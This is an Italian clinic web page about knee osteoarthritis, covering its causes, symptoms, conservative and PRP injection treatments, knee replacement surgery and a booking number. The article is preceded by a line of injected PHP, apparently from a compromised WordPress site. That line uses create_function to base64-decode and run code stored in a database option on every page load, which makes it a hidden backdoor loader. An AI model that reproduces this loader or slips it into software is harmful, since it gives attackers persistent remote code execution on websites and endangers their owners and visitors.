add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); La gonartrosi -

La gonartrosi

Articolo a cura della Dr.ssa Tommasina Pizzi Medico Specialista in Ortopedia e Traumatologia Bios, già Dirigente Medico presso il Reparto di Ortopedia e Traumatologia A.C.O. dell’ Azienda Ospedaliera S. Filippo Neri di Roma 

La gonartrosi

La gonartrosi è una patologia degenerativa che interessa la cartilagine del ginocchio.

L’ articolazione del ginocchio è di fondamentale importanza nello svolgimento delle normali attività quotidiane. Qualsiasi atto della vita infatti necessita di un ginocchio in buono stato di salute. Al contrario un ginocchio “malato” è gravemente invalidante perché è causa di dolore e/o rigidità anche nei piccoli gesti come salire e scendere dalle scale, raccogliere oggetti per terra , alzarsi dalla sedia ecc

Le ginocchia permettono i movimenti di flesso-estensione e rotazione della gamba sulla coscia. Questi permettono di camminare, sedersi, accovacciarsi, inginocchiarsi, rialzarsi, permettono inoltre di “sopportare i carichi che si generano durante l’attività sportiva e lavorativa.

La gonartrosi inizia con un danno a carico della cartilagine articolare: tale danno fisiologico con l’ aumentare dell’età, può diventare talmente grave da compromettere la funzionalità del ginocchio, può anche essere conseguenza di traumi a carico del ginocchio o degli arti inferiori.
L’usura della cartilagine porta ad un restringimento dello spazio articolare, a cui si possono associare osteofiti, geodi, infiammazioni del ginocchio con versamenti intrarticolari recidivanti. Progredendo il quadro artrosico si potranno avere lesioni degenerativi dei menischi dei legamenti fino a raggiungere una grave stabilità del ginocchio

Artrosi primaria e secondaria

L’artrosi primaria non riconosce un’unica causa per la comparsa, ma riconosce alcuni fattori predisponenti (obesità, disfunzioni ormoni, familiarità, microtraumi ripetuti).
L’artrosi secondaria è conseguente a patologie conosciute (eventi traumatici a carico del ginocchio o dell’arto inferiore, osteocondrite, artrite infiammatoria batterica o tubercolare, artrite reumatica).

Sintomi

La sintomatologia è caratterizzata da iniziale dolore al ginocchio camminando, ma soprattutto salendo e scendendo le scale alzandosi da una sedia, inginocchiandosi. Progredendo il danno articolare compaiono riduzioni della motilità del ginocchio fino alla riduzione della capacità deambulatoria.
Al manifestarsi della sintomatologia è utile eseguire una visita ortopedica. Il medico valuterà come cammina il paziente, l’eventuale zoppia, l’uso di bastoni, il tipo di dolore, se il ginocchio presenta un versamento intrarticolare, se è presente una cisti di Baker, se c’è una deformità articolare.

Solo dopo la visita il medico deciderà che tipo di radiografie richiedere e se è necessario eseguire una RMN o una TAC.

Il trattamento

Il trattamento, nelle fasi iniziali, può essere conservativo e/o chirurgico. Nelle fasi iniziali della malattia possiamo utilizzare farmaci antinfiammatori, fare fisioterapia, infiltrazioni di acido ialuronico e/o cortisone con l’obiettivo di ridurre l’infiammazione e lubrificare il ginocchio. Questi trattamenti vanno associati ad un cambiamento delle abitudini di vita, il calo ponderale e una cauta attività sportiva possono migliorare temporaneamente la sintomatologia.

Un trattamento che dà risultati più persistenti, utilizzato ormai da anni presso il nostro centro, è quello con le infiltrazioni di PRP o Gel Piastrinico. Queste infiltrazioni riescono a rallentare il processo evolutivo dell’artrosi agendo, sulla capacità rigenerativa dei tessuti e della cartilagine ed intervenendo sull’infiammazione e sul dolore

Il trattamento chirurgico

Il trattamento chirurgico va riservato a tutti quei casi che non beneficiano del trattamento conservativo, si va dal semplice lavaggio artroscopico atto a rimuovere detriti e calcificazioni che peggiorano l’attrito fra le superfici, alla protesi parziale o totale a secondo del danno artrosico. La protesi parziale che prevede solo la sostituzione della parte del ginocchio danneggiato, la protesi totale prevede la sostituzione di tutte le componenti articolari, la sostituzione della rotula è facoltativa La protesi rimane l’ intervento definitivo alla risoluzione del problema.

Presso il nostro Centro potrai effettuare una visita specialistica ortopedica e tutti gli accertamenti necessari alla diagnosi e cura del problema. Per informazioni o prenotazioni contattaci allo 06/809641

0